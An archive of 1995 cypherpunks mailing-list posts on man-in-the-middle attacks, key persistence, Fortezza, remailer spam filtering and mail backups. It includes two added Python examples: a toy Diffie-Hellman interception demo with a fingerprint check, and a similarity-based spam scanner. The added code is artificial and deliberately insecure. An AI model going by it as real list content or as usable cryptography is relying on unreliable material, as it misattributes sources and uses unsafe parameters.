> I ran 'strings' on the binary, and only got one "about.*security" reference.
> 
> entering it as an URL
> 		
> 		about:security
> 
> yields the ironically humorous (when you consider all of the security bugs):
> 
> 		Whatchew talkin' 'bout, Willis?
> 

On my PC the even funnier,

		 Yeah, whatever...

results for the same URL.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Tue, 10 Oct 95 21:37:59 PDT
To: pjb@ny.ubs.com
Subject: Re: Basic Flaws in Internet Security and Commerce
Message-ID: <9510110433.AA05447@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


Paul said:

> A fine piece of work.  The ideas expressed in this paper should scare
> the hell out of everyone who uses NFS for any serious applications,
> which for a fact includes most banks and all investment banks and
> brokerage houses.  In this particular area I KNOW what is at risk.
> Again, I congratulate the authors on a first-class effort.

I agree, it's a good job of publicizing these holes, but (not to take
anything away from these guys, I'm sure they know this), these are not
newly found holes.  These attacks on NFS have been known and exploited
for years and are well known within the security community.

What if all NFS traffic was encrypted via a shared key distributed via
Diffie-Hellman?  Now that would REALLY be secure NFS;)  (I know, I know,
DH doesn't do secure authentication, so how does Alice know that she
didn't just agree to a secret with our Mr Bucket Brigade Mallet!)

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Tue, 10 Oct 95 20:37:30 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Man in the Middle Revisited (but not for the last time)
In-Reply-To: <ac9ec6b5070210049d4b@[205.199.118.202]>
Message-ID: <199510110337.VAA20392@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 The entity calling itself "Timothy C. May" <tcmay@got.net> is alleged to
 have written:
>
> I don't know if "Carl Ellison the Key" is "really" the same Carl Ellison
> that Carl Ellison the Key claims to be...you see the semantic difficulties.

<snip>


Ah, but what we are concerned with is whether "Carl Ellison the Key" is
*really* the same "Carl Ellison the Key" that you think he is.  :-)  Or
to put it another way, that *he* thinks he is the same "C.E. the Key" 
that you think he is.


> To put it bluntly, all I really care about is _persistent_ key-holding,
> i.e., that the person who began posting with a given key is still using the
> same key. Or, rather, I don't even care if the keyholder "Pr0duct Cypher"
> is actually a person, or a Bourbaki-style committee--I only care that
> messages purporting to be from Pr0duct Cypher or Black Unicorn or Carl
> Ellison are still using the same key.
> 
> Who any of these entities "really" are is irrelevant to me. (I don't even
> know if Hal Finney, who I met once a few years ago, is the "real" Hal
> Finney, nor do I really care.)


Well and good, Tim, but you *do* care if the entity calling itself "Hal
Finney" is being surrounded by the Man in the Channel ("Mitch") and all 
of your communications with that entity are under Mitch's control.  For
example, you may choose to enter a contract with the entity calling
itself "Hal Finney", and provide some sort of consulting service to it
in exchange for 10,000 cyberbucks.  If Mitch is actually in control
then he could easily steal both the output of your consultation *and* 
Hal's 10,000 cyberbucks and leave the two of you hating each other.


Perhaps by "persistent key-holding" you mean to imply "without being
spoofed by Mitch", in which case I'm sure that you agree on the
importance of anti-Mitch measures.  :-)


Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMHs70fWZSllhfG25AQECWwQAnk/HRTk/h0tCT80AriH28yLlCQiciGmV
T1LShDolvEGEgHThm7tG4LGRVoVUyn7h4MbmJMCXsOV7i0RlvMTA4yVZW9KIiN4O
lSzWIQSdIYLS2SQ93cmDART6kV0BBC50FeAAfEBy9PNPaX7ifjmpB0QFzjeLxTG5
TXglWqP9ijo=
=K9/N
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Tue, 10 Oct 95 23:59:21 PDT
To: cypherpunks@toad.com
Subject: MITM garbage
Message-ID: <199510110408.WAA00256@wero.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Scott Brickner writes:

>By "successful" I mean communicating without the MITM *interfering*.
>Either the parties need to exchange a symmetric key without the MITM
>eavesdropping, or exchange asymmetric keys without the MITM modifying
>them.

First of all, I think this "you can't prove there's no MITM, so might as
well not use crypto at all" stuff that some people believe is garbage. 
Once you've successfully gotten your key out, Mitch can't expect to mount
an effective MITM attack "against" you. [isolating someone else from you
is a different story] In fact, Mitch can't really MITM anyone who has any
kind of cryptocontact with the general public. Obtaining a single
non-mitch public key cuts the attack down the middle. Being able to get
your key out without it being intercepted also foils the attack, since once
there is suspicion of a MITM attack, people are going to investigate. You
can't erase cryptographic evidence of MITM activity, either. So, once your
keys are actually "out there", you can no longer be effectively attacked
without leaving messy trails here or there. 

The other problem, of course, is how do you know you haven't already been
MITM'd. You don't. You can't, unless you expose it by publishing your key
to someone through a channel that can't be D.O.S.'d. Publishing a hash/sig of
future posts is not terribly practical, because not only does the hash/sig
have to be expected beforehand but what the hash is for has to be known as
well. If I publish a detached signature of something (could be my key, or
might not be) then Mitch will just have to make something up, make a sig
for it, and publish THAT. 

Posting the source code to RC5, for example, after sending out a hash
first means that Mitch will have to send out whatever it was he hashed in
place of my hash, and then make HIS hash of RC5 code, then quickly follow
up with the actual code that I was kind enough to mail to him. And since
Medussa is by definition "in the middle" I don't ever realize that any of
that happened. I suppose the "overloading the processors" works well if
you can be sure you've overloaded it, which means not only that you know
already what Mitch's power is, but you know of someone else (a group
perhaps) that has even MORE power, such that Mitch will stick out in the
timing. 

So, if you ask me, none of _those_ methods are very trustworthy considering
the resources you have to have already assigned to Mitch - after all, 
keeping a 24 hour Medussawatch on you and your whole ISP is tough work. 
Going _through_ Mitch is not easy.

>The chance of failure is minimized by diversity in the channels used to
>try to bypass the MITM. 

I agree-On the other hand, it's not terribly difficult to go _around_
Mitch.  I mean, just how many of the following things has Mitch done:
Watch all the ISP's in town and all the phone lines you can use to call
them.  Filter your work/school ISPs. Filter all your net-using neighbors,
co-workers, and friends' accounts. etc. All it takes is to get one
non-Mitch public key. 

Of course, once the MITM gig is up, the option of locking you in a room 
since 1983 will make Mitch the "new you", meaning there is no longer a 
middle. (Fortunately, though, Bob was MITM'ing Mitch at the same time,
and now you're both out of the loop and Bob has the goods now, cuz what's 
Mitch gonna do about it?)

>you can't afford a failure, you *do* need a channel over which you have
>nearly complete control.  The simplest such channel is a physical
>meeting, during which you exchange public keys.  If the MITM threat is

How do you know you're not giving your key to Mitch. And how do you know
that Mitch isn't headed over to Alice's later on to pretend to be you and 
give Alice "your" key?

Don "Medussa for short"

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMHtC+sLa+QKZS485AQEEmwL+NbEoXoeJPEBKGFev8gLWBCIoniyXS4o5
YyyGnkfTjsc/DimbU15z++d/fcihUzwK/dLKBXub3fdxcna9m9YyLNEdo8QyhPNb
/Wp6PKq9SdfMb6uCzgoVwg7PrtTZzZEe
=jN+h
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don     or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Junk mail to root@127.0.0.1
* This user insured by the Smith, Wesson, & Zimmermann insurance company *
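
[Added example, not code from any poster on the list. It puts two points from the messages above into runnable form: Patrick Horgan's remark that Diffie-Hellman alone does not authenticate the peer, and Don's remark that one public key obtained outside Mitch's control exposes him. The toy group, the class and function names and the 64-bit fingerprint are assumptions made for illustration.]

```python
import hashlib
import secrets

# Toy parameters (assumption, illustration only): 2**127 - 1 is prime but
# far too small for real use.
P = 2**127 - 1
G = 3


def fingerprint(pub):
    """Short digest of a public value: what the parties compare out of band."""
    return hashlib.sha256(pub.to_bytes(16, "big")).hexdigest()[:16]


class Party:
    def __init__(self, name):
        self.name = name
        self._priv = secrets.randbelow(P - 3) + 2   # private exponent in [2, P-2]
        self.pub = pow(G, self._priv, P)

    def session_key(self, peer_pub):
        """Derive a key from whatever public value arrived on the wire."""
        shared = pow(peer_pub, self._priv, P)
        return hashlib.sha256(shared.to_bytes(16, "big")).hexdigest()


def honest_relay(sender, pub):
    """A channel that delivers public values unmodified."""
    return pub


class Mitch:
    """Man in the channel: replaces every public value in transit with his own."""

    def __init__(self):
        self.me = Party("Mitch")
        self.captured = {}

    def relay(self, sender, pub):
        self.captured[sender] = pub
        return self.me.pub

    def session_keys(self):
        # One key per victim, each derived from that victim's real public value.
        return {name: self.me.session_key(pub)
                for name, pub in self.captured.items()}


def exchange(alice, bob, relay):
    """One unauthenticated DH exchange; records what each side actually received."""
    bob_receives = relay(alice.name, alice.pub)
    alice_receives = relay(bob.name, bob.pub)
    return {
        "alice_key": alice.session_key(alice_receives),
        "bob_key": bob.session_key(bob_receives),
        "alice_saw": fingerprint(alice_receives),
        "bob_saw": fingerprint(bob_receives),
    }


def fingerprints_ok(result, published):
    """The defensive check: does the key seen on the wire match the
    fingerprint obtained over an independent channel?"""
    return (result["alice_saw"] == published["Bob"]
            and result["bob_saw"] == published["Alice"])


def demo():
    alice, bob = Party("Alice"), Party("Bob")
    # Fingerprints each party got "out" through a channel Mitch does not control.
    published = {"Alice": fingerprint(alice.pub), "Bob": fingerprint(bob.pub)}

    clean = exchange(alice, bob, honest_relay)
    mitch = Mitch()
    attacked = exchange(alice, bob, mitch.relay)

    return {
        "clean_keys_match": clean["alice_key"] == clean["bob_key"],
        "clean_fingerprints_ok": fingerprints_ok(clean, published),
        # Under attack each victim shares a key with Mitch, not with the peer.
        "attacked_keys_match": attacked["alice_key"] == attacked["bob_key"],
        "mitch_holds_both_keys": mitch.session_keys() == {
            "Alice": attacked["alice_key"], "Bob": attacked["bob_key"]},
        # ...and the substitution is visible as soon as fingerprints are compared.
        "attacked_fingerprints_ok": fingerprints_ok(attacked, published),
    }


if __name__ == "__main__":
    for check, value in demo().items():
        print(f"{check}: {value}")
```

Neither victim can tell the two runs apart from the exchange alone; only the comparison against the independently obtained fingerprint fails in the attacked run.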




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Rose <mrose@stsci.edu>
Date: Tue, 10 Oct 95 19:20:26 PDT
To: "Rev. Mark Grant" <mark@unicorn.com>
Subject: Re: Netscape & Fortessa
In-Reply-To: <Pine.3.89.9510110202.A28210-0100000@unicorn.com>
Message-ID: <9510110220.AA02365@MARIAN.SOGS.STSCI.EDU>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> On Wed, 11 Oct 1995 02:45:16 +0100 (BST), "Rev. Mark Grant" <mark@unicorn.com> said:

>So on those grounds, the only real danger would be for the government to 
>start selling Clipper cards for $ 5 apiece. Of course, I wouldn't put it 
>past them....

>	Mark

Fortezza cards are $70.  Is that close enough?

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 10 Oct 95 19:27:00 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Graphic encryption
In-Reply-To: <199510110207.WAA07713@ask.cs.cornell.edu>
Message-ID: <199510110226.WAA12742@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Allow me to add some more partially informed speculation about unreleased
source code to the pile:

Bill Stewart writes:
> The description of Privasoft's method on their web page sounded like* it
> broke up a fax image into little squares and shuffled them around based on
> some proprietary (hence presumably weak) algorithm, somewhat like feeding
> them to a shredder or puzzle-box, then put them in a file you can ship
> with regular fax software or decrypt yourself.  If that's the case,
> and if the squares are sufficiently big to have enough pixels for fax
> software to compress decently, then it's weak no matter _how_ strong
> the encryption algorithm that shuffles them is, because you can piece together
> matching edges like a jigsaw puzzle, or like a bunch of Iranian students
> with American Embassy shredded documents.  

:}

[...]
> * The software was on the web page; if I'd had spare disk space that day and
> some slack time I could have downloaded the demo version and tried it,
> but this is what the description sounded like it meant.

The graphic encryption patents I found a couple of weeks ago (cited here then) 
describe a method that I don't believe would be susceptible to a "jigsaw"
attack like this. The patented method specifies encrypting the image bitmap
bit-by-bit (it suggests XORing with a (P)RNG stream). So the square
granularity would fail your second criterion for the applicability of a jigsaw
attack. 

However, I only have circumstantial evidence to suggest that the PrivaSoft 
software actually uses the patents I've seen.

Perhaps PrivaSoft Inc. could comment on which patent(s) (if they have already 
issued) form the basis for the use of encryption in their product ?

One last note: I would certainly have a hard time applying a jigsaw attack to
the sample ciphertext image at http://www.privasoft.com/images.html (and
enlarged at http://www.privasoft.com/scramima.html). Maybe it would be easier
if the plaintext image consisted of a picture with more macroscopic structure.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 10 Oct 95 20:03:59 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: spam detector algorithm?
In-Reply-To: <199510110244.WAA07789@ask.cs.cornell.edu>
Message-ID: <199510110303.XAA12811@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Greg Broiles writes:
> I've been mulling over algorithmic/computational ways to spot spams
> for some time now. I think I might've come up with a way to represent
> messages (and compare representations) that would be useful to remailer
> operators who don't want to let spams (where "spam" == many messages with
> identical or very similar content) through their remailers. 
[many details elided...]
> Any thoughts about this? Interesting? Stupid? Like I said, my math is weak. 
> My intention is to try to cobble up a 2d version of this to see how it runs
> but I thought I'd see if anyone can point out why it can't work, or if it's
> useful enough that someone with a better math background than I've got 
> wants to take this idea somewhere better. 

It sounds like you are liable to start reinventing parts of the field of
information retrieval. The automatic construction and comparison of vectors
of document parameters, as you suggested in the part I omitted, is one 
approach that has met with some success. (The common problem is, given a set
of query attributes or a model document, to find relevant documents matching
the query or similar to the model document. A variety of relevance measures
has been considered.)

I can't give you any specific pointers, but I advise you to check out 
existing implementations of these and other techniques for information
retrieval before you spend too much time writing new code.

FWIW, I _do_ think that such tactics would be very effective in combatting 
much of the spam served up these days.

> One side effect to the deployment of spam detectors may be that the remailer
> pinging services will need to move to using encrypted packets. 
[...]
> My impression is (speak up if I'm wrong) that requiring encryption for the
> ping packets wouldn't be an enormous burden on the pinging services because
> the new generation of software sends fewer pinging packets such that the
> CPU time required isn't an issue. 

Last time I looked, Raph's software already encrypts ping messages to 
remailers that have PGP keys. I assume you intend to perform the spam check
after removing the optional outer layer of encryption on each incoming
message.

Perhaps the ping messages would survive unscathed if you only applied the
spam scan to messages larger than some minimum size. I haven't seen too many
1 or 2 line spams.

-Futplex <futplex@pseudonym.com>
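
The two suggestions in the reply above, sketched as an added example (not part of the post, and not Greg Broiles's scheme, whose details are elided): messages become word-bigram count vectors, are compared by cosine similarity, and are skipped entirely when below a minimum size so that short ping messages pass. The feature choice, thresholds, class name and sample messages are assumptions constructed for illustration.

```python
import math
import re
from collections import Counter

# All three thresholds are assumptions chosen for this illustration.
MIN_BODY_BYTES = 128   # smaller bodies (e.g. ping messages) are never scanned
SIMILARITY = 0.8       # cosine at or above this counts as "very similar"
MAX_COPIES = 2         # hold a message once this many similar ones were seen


def vector(body):
    """Represent a message body as counts of adjacent word pairs (bigrams)."""
    words = re.findall(r"[a-z0-9']+", body.lower())
    return Counter(zip(words, words[1:]))


def cosine(a, b):
    """Cosine similarity of two sparse count vectors; 0.0 if either is empty."""
    dot = sum(a[k] * b[k] for k in a.keys() & b.keys())
    norm_a = math.sqrt(sum(v * v for v in a.values()))
    norm_b = math.sqrt(sum(v * v for v in b.values()))
    return dot / (norm_a * norm_b) if norm_a and norm_b else 0.0


class SpamScan:
    """Keeps vectors of messages already seen and flags near-duplicates."""

    def __init__(self):
        self.seen = []

    def check(self, body):
        # Applied after any outer encryption layer has been removed.
        if len(body.encode()) < MIN_BODY_BYTES:
            return "pass-small"
        v = vector(body)
        copies = sum(1 for old in self.seen if cosine(v, old) >= SIMILARITY)
        self.seen.append(v)
        return "hold" if copies >= MAX_COPIES else "pass"


# Constructed sample traffic: one chain letter sent to several names,
# one unrelated message, and short pings.
TEMPLATE = ("Dear {name}, make money fast with this amazing offer. Send five "
            "dollars to each of the names on the list below, then add your own "
            "name to the bottom of the list and mail copies of this letter to "
            "as many people as you can reach today.")
UNRELATED = ("The key signing party will be held after the Saturday meeting. "
             "Bring a printed copy of your key fingerprint and some form of "
             "identification so others can check it.")
PING = "ping 1995-10-10 remailer-test"

MESSAGES = [
    TEMPLATE.format(name="Alice"), PING, TEMPLATE.format(name="Bob"),
    UNRELATED, TEMPLATE.format(name="Carol"), PING,
    TEMPLATE.format(name="Dave"),
]


def run_sample():
    """Run the constructed traffic through one scanner, in order."""
    scan = SpamScan()
    return [scan.check(m) for m in MESSAGES]


if __name__ == "__main__":
    for verdict, msg in zip(run_sample(), MESSAGES):
        print(f"{verdict:10} {msg[:40]!r}")
```

Changing only the recipient name leaves the cosine between two copies at 0.96, so the third and later copies are held while the pings and the unrelated message pass.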



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mkj@october.ducktown.org
Date: Tue, 10 Oct 95 21:06:32 PDT
To: cypherpunks@toad.com
Subject: Re: Crypto's Role in Evil?
Message-ID: <199510110312.AA01324@october.ducktown.org>
MIME-Version: 1.0
Content-Type: text/plain


> > We mustn't forget that, until very recently, strong, widespread
> > privacy has been humanity's "default" condition.
> 
> Not much privacy in village or tribal life.  Even neighborhoods of 
> earlier cities weren't very private.  Neighbors always knew your business.

I now realize that my first response to this point was stupid.  I was
focused exclusively on what one might call "transient" privacy -- the
ability to wander out of general earshot for the occasional private
conversation.  I now see that there is another kind of privacy, which
one might call "steady-state" privacy -- that is, the ability to live
large portions of one's life out of the light of public scrutiny.

In traditional small village or tribal life, transient privacy is
rarely threatened, but steady-state privacy may be nonexistent.  This
is an important point which I didn't get the first time around, and I
apologize for giving it short shrift.

The various GAK strategies, on the other hand, represent a nearly
opposite strategy, preserving (at least in theory) general
steady-state privacy (thereby perhaps satisfying the letter, if not
the spirit, of most human rights law) while making it impossible to
reliably ensure the privacy of any specific thing (Bentham's concealed
random observer model for cost-efficient control of a population).

These two types of privacy, of course, are not truly distinct, but are
ends of a continuous spectrum.  Yet they raise different challenges.
This is all very interesting; it seems to imply the possibility of
some sort of analytic system.

But it's late and I'm not particularly brilliant, so I'll end here.

					---  mkj



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 11 Oct 95 00:01:37 PDT
To: garnett@wombat.catbelly.com (Santiago de la Paz)
Subject: Re: PC disk wipe softwar
In-Reply-To: <199510110113.TAA08320@wombat.catbelly.com>
Message-ID: <199510110656.XAA28320@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Excuse me? Yes, most systems back up everything. I run an
ISP. We back up -everything- (well not netnews), nightly.

> 
> 
> > Often files retrieved include e-mail thought to have been
> > erased long ago. It survives because the diligent
> > computer system manager makes backup tapes of everything
> > on the system every night, then stores those tapes for
> > years.
> 
> Uh... they back up their *mail* spools?  Yeah, right.
> 
> ~james
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 11 Oct 95 00:04:46 PDT
To: mark@lochard.com.au (Mark)
Subject: Re: Hal's Third Challenge?
In-Reply-To: <199510102312.AA37668@junkers.lochard.com.au>
Message-ID: <199510110659.XAA28427@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> IMHO we owe Netscape some counter pr against m$, we've proved our point to
> Netscape and they performed admirably by being open and responsible to the
> net.community. Whilst it didn't seem to dent their share value, they did cop

	<yawn> This is old news. http://www.c2.org/hackmsoft/ has been
around for multiple weeks now.

> some bad press (and some media weenies still think their product is broken)
> because of the group's efforts. What goads me is m$ trying to use this in
> their press dealing and acting like this is entirely different from their
> situation. Seems to me they need it proved to them that because of their
> proprietary attitude they are in a worse position. In short bring them down
> to earth and serve their ego to them on a plate.
> 
> Cheers,
> Mark
> mark@lochard.com.au
> The above opinions are rumoured to be mine.
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Santiago de la Paz <garnett@wombat.catbelly.com>
Date: Tue, 10 Oct 95 23:07:06 PDT
To: cypherpunks@toad.com
Subject: Re: PC disk wipe software
In-Reply-To: <199510110319.AA32344@junkers.lochard.com.au>
Message-ID: <199510110606.AAA08734@wombat.catbelly.com>
MIME-Version: 1.0
Content-Type: text/plain



> People do record their incoming and outgoing email. Smart ones will store it
> offsite (auto forward to their home machine). Others will pgp them online.
> Mostly though the cleartext email files will be happily archived away each
> night to the nice friendly DAT tape down the corridor in the machine room.

I mistakenly interpreted the original posting as "outgoing only."  Incoming
mail must certainly be saved; however, backing up an outgoing mail spool on
a busy machine is senseless.  By "busy", I mean "that machine which serves
as a mail server".

Outboxes change the situation, but they are not universal.  

> Me, I just nuke any sensitive information that may arrive in my work mbox,
> or save/forward it to a safer place. I discourage people from using my work
> address as a regular personal contact point.

This brings up an interesting point, namely: where is your email secure?  If
the FBI or security agency of your choice decides to clamp a legal hold upon
the machines upon which you work, they surely wouldn't be so foolish as to
forget about your home machine over that frame-relay or ppp/slip link.  In
such a situation, telling people to use any mailbox at all is useless unless
they encrypt with a relatively secure encryption package, z.B. pgp.

> Also ensure your admins aren't the nosy types. I started work at one place
> and noticed in the /.sh_history file that the previous admin was regularly
> grepping people's mail spools for his name. This caused some concern to the
> management when they were informed. Obviously these forays were not part of
> his everyday job and were a personal endeavour.

This is a problem, and almost certainly more of a problem than security
agencies demanding your backup tapes.  There's also no way around it; the
only solution is encryption.

~james




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 10 Oct 95 21:29:16 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape & Fortessa
In-Reply-To: <199510110025.RAA10439@jobe.shell.portal.com>
Message-ID: <199510110427.AAA05498@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199510110025.RAA10439@jobe.shell.portal.com>,
hfinney@shell.portal.com (Hal) wrote:

> There seems to be a convergence on this approach to a hardware
> solution.  HP has been pushing for a model in which software with hooks
> for hardware encryption will be allowed to get exported.  Then you can
> plug in whatever level of encryption you are able to have in the
> form of a card token.  Traditionally NSA has opposed export of software
> with hooks but there are some indications that this method could be
> accepted eventually.

Yes, it might, because of the strong support by vendors for voluntary GAK
or no crypto at all. Let me explain. There are a number of indicators that
show that strong crypto is losing in the global marketplace. Example: the
charter of the new IETF Internet Payment Systems working group requires
that the use of crypto be limited. In the discussion about the charter,
the near unanimous consent (with myself as the sole dissenter) was that
crypto may only be used for authentication, not confidentiality.

It is true that the prospect of loosening the rules for crypto
software/hardware implementations is a major motivator in the marketplace.
The whole development of National Semi's iPower PCMCIA card was driven by
a promise made by the NSA of high lot numbers due to (future?) relaxed
export rules. I suppose that trapdoors in hardware are much harder to find
than trapdoors in software.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMHtHmCoZzwIn1bdtAQFm6AGAje0x07V6Ak/nnBLIQyAv9XDZToUw0vju
2GmRq/F1eSeiiOGfXwVGP+irPFd1W/tg
=nix8
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 11 Oct 95 00:24:59 PDT
To: cypherpunks@toad.com
Subject: Re: Man in the Middle Revisited (but not for the last time)
Message-ID: <aca0be1c14021004e28c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


I suspect I'm not the only one getting weary of going around and around on
this issue, so I'll confine my response to just one point:

At 3:37 AM 10/11/95, Bryce wrote:

>> Who any of these entities "really" are is irrelevant to me. (I don't even
>> know if Hal Finney, who I met once a few years ago, is the "real" Hal
>> Finney, nor do I really care.)
>
>
>Well and good, Tim, but you *do* care if the entity calling itself "Hal
>Finney" is being surrounded by the Man in the Channel ("Mitch") and all
>of your communications with that entity are under Mitch's control.  For
>example, you may choose to enter a contract with the entity calling
>itself "Hal Finney", and provide some sort of consulting service to it
>in exchange for 10,000 cyberbucks.  If Mitch is actually in control
>then he could easily steal both the output of your consultation *and*
>Hal's 10,000 cyberbucks and leave the two of you hating each other.

Nope. au contraire, negatory. I *do not* care if the entity calling itself
"Hal Finney" is being surrounded by an MITM. Only "Hal Finney the Key" can
read messages I encrypt to the public key I got from him long ago, so if
the "Hal + MITM" can do so, they are effectively one and the same.

(Not really, in some other senses, but far beyond anything simple crypto
can handle.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@dorsai.dorsai.org>
Date: Tue, 10 Oct 95 22:35:20 PDT
To: Nahum Goldmann <Nahum.Goldmann@ARRAYdev.com>
Subject: Re: The Ultimate GUK[TM] (Globally Unique Key) Biotech Racket
In-Reply-To: <199510090009.UAA19196@array1.arraydev.com>
Message-ID: <Pine.SUN.3.91.951011013015.29274J-100000@dorsai.dorsai.org>
MIME-Version: 1.0
Content-Type: text/plain


Bad idea.

What's to stop someone from getting a hair off your hairbrush, or shaking 
hands with you while wearing gloves that can scrape off enough cells from 
you to get your DNA - then they have your private key.

Not cool.  Hell, clipper (barf!) would be safer.

==========================================================================
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. |   _ |>
  \|/  |sunder@dorsai.org| Where day by day, yet another   |   \ |
<--+-->|                 | Constitutional right vanishes.  |    \|
  /|\  |    Just Say     |                                 |    <|\
 + v + | "No" to the NSA!| Jail the censor, not the author!|    <| n
==========================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Tue, 10 Oct 95 17:53:10 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <9510092146.AA28192@alpha>
Message-ID: <Pine.HPP.3.91.951011013937.26964A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


Mike McNally wrote:

> interested in a little e-hanky-panky, I can ask around the sleazier
> corners of the net to see whether Alice is the kiss-and-post type.
> 
> Somebody's going to have to explain to my thick skull how it is that a
> certificate system makes this process any different, fundamentally.

_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
*This Key was signed by AidsFree Inc., a THL (Trusted HIV Laboratory)*
 
 The Time-Stamped Public Key of AidsFree Inc. can be found at:
 shttp://health.cdc.gov/hiv/trusted_labs/aidsfree/dec-99/

 Date: 20/12/99
 Aidsfree Inc. certifies that a person (*Alice*) in proven 
 possession of This Key was tested HIV negative at this date.
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Santiago de la Paz <garnett@wombat.catbelly.com>
Date: Wed, 11 Oct 95 00:50:12 PDT
To: cypherpunks@toad.com
Subject: Re: PC disk wipe softwar
In-Reply-To: <199510110656.XAA28320@infinity.c2.org>
Message-ID: <199510110750.BAA08909@wombat.catbelly.com>
MIME-Version: 1.0
Content-Type: text/plain



> Excuse me? Yes, most systems back up everything. I run an
> ISP. We back up -everything- (well not netnews), nightly.

Hmm.  And why *don't* you back up netnews?  For more or less the
same reasons it's not particularly useful to back up outgoing mail
spools; to claim that "most systems do blah blah" is like saying that
"most people like menudo."  I, for one, don't.

"{I/we} run an ISP" is a ubiquitous statement these days;  everybody and his
brother "runs an ISP."  I know a drunken college dropout down the block with
a limping sun 3/50 and two phone lines who prides himself on his ISP.  What is 
not so common is common sense regarding privacy, i.e. there is not any real 
reason to back up an *outgoing* mail spool unless you want security_agency_of_
your_choice to come and root through your exabyte tapes next week.

Now, as I mentioned in a followup, incoming mail is a different matter.  At
some point it loses its meaning, though: mail is mail, and it's all incoming
